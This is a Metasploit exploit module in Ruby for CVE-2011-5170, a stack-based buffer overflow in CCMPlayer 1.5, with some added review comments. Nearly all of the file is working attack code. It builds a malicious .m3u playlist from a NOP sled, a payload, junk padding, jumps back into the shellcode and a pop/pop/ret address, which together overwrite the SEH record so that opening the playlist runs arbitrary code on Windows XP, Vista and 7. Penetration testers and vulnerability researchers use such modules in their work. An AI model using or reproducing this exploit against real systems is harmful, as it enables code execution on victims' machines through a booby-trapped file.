##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  # Registers the module metadata (name, description, references, payload
  # constraints, the single target) and the FILENAME option consumed by the
  # FILEFORMAT mixin's file_create.
  #
  # @param info [Hash] extra metadata merged in by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow',
      'Description' => %q{
        This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening
        a m3u playlist with a long track name, a SEH exception record can be overwritten
        with parts of the controllable buffer. SEH execution is triggered after an
        invalid read of an injectable address, thus allowing arbitrary code execution.
        This module works on multiple Windows platforms including: Windows XP SP3,
        Windows Vista, and Windows 7.
      },
      'License' => MSF_LICENSE,
      'Author' => ['Rh0'], # discovery and metasploit module
      'References' =>
        [
          ['CVE', '2011-5170'],
          ['OSVDB', '77453'],
          ['EDB', '18178']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload' =>
        {
          # Upper bound on payload.encoded; see the 'Offset' arithmetic in #exploit,
          # which subtracts the payload length from 'Offset' (also 0x1000).
          'Space' => 0x1000,
          'BadChars' => "\x00\x0d\x0a\x1a\x2c\x2e\x3a\x5c", # \x00\r\n\x1a,.:\\
          # NOTE(review): this is the string 'True', not the boolean true; any
          # non-nil/false value is truthy in Ruby, but confirm how the framework
          # tests this key before relying on it.
          'DisableNops' => 'True',
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [
            'CCMPlayer 1.5',
            {
              # pop esi / pop ebx / ret (in ccmplay.exe)
              # tweak it if necessary
              'Ret' => 0x00403ca7, # last NULL in buffer is accepted
              # Total bytes written after the "C:\" prefix and before the
              # 0xffffffff marker (NOP sled + payload + junk); see #exploit.
              'Offset' => 0x1000
            }
          ]
        ],
      'Privileged' => false,
      'DisclosureDate' => '2011-11-30', # to my knowledge
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.m3u']),
      ])
  end

  # Builds the .m3u contents and writes them out via file_create.
  #
  # The layout is strictly position-dependent: the two relative jumps and the
  # 'Offset' subtraction below assume exactly the byte counts appended by the
  # preceding statements, so the order and sizes of the appends must not change
  # independently of each other.
  #
  # @return [void]
  def exploit

    m3u = "C:\\"
    # shellcode
    # 25 single-byte NOPs assembled via Metasm (the 25 is also hard-coded in the
    # 'Offset' arithmetic below).
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "nop").encode_string * 25
    m3u << payload.encoded
    # junk
    # NOTE(review): 'Space' (0x1000) equals target['Offset'], so a payload longer
    # than 0x1000 - 25 bytes would make this length negative — confirm the
    # effective payload size stays under that bound.
    m3u << rand_text_alpha_upper(target['Offset'] - (25 + payload.encoded.length))
    # need an access violation when reading next 4 bytes as address (0xFFFFFFFF)
    # to trigger SEH
    m3u << [0xffffffff].pack("V")
    # pad
    m3u << rand_text_alpha_upper(3)
    # long jmp: jmp far back to shellcode
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-4103").encode_string
    # NSEH: jmp short back to long jmp instruction
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5").encode_string
    # pad (2 more bytes are needed to fill up to 4, as jmp $-5 is only 2 bytes)
    m3u << rand_text_alpha_upper(2)
    # SEH Exception Handler Address -> p/p/r
    m3u << [target.ret].pack("V")
    m3u << ".mp3\r\n" # no crash without it

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    # Open CCMPlayer -> Songs -> Add -> Files of type: m3u -> msf.m3u => exploit
    file_create(m3u)

  end
end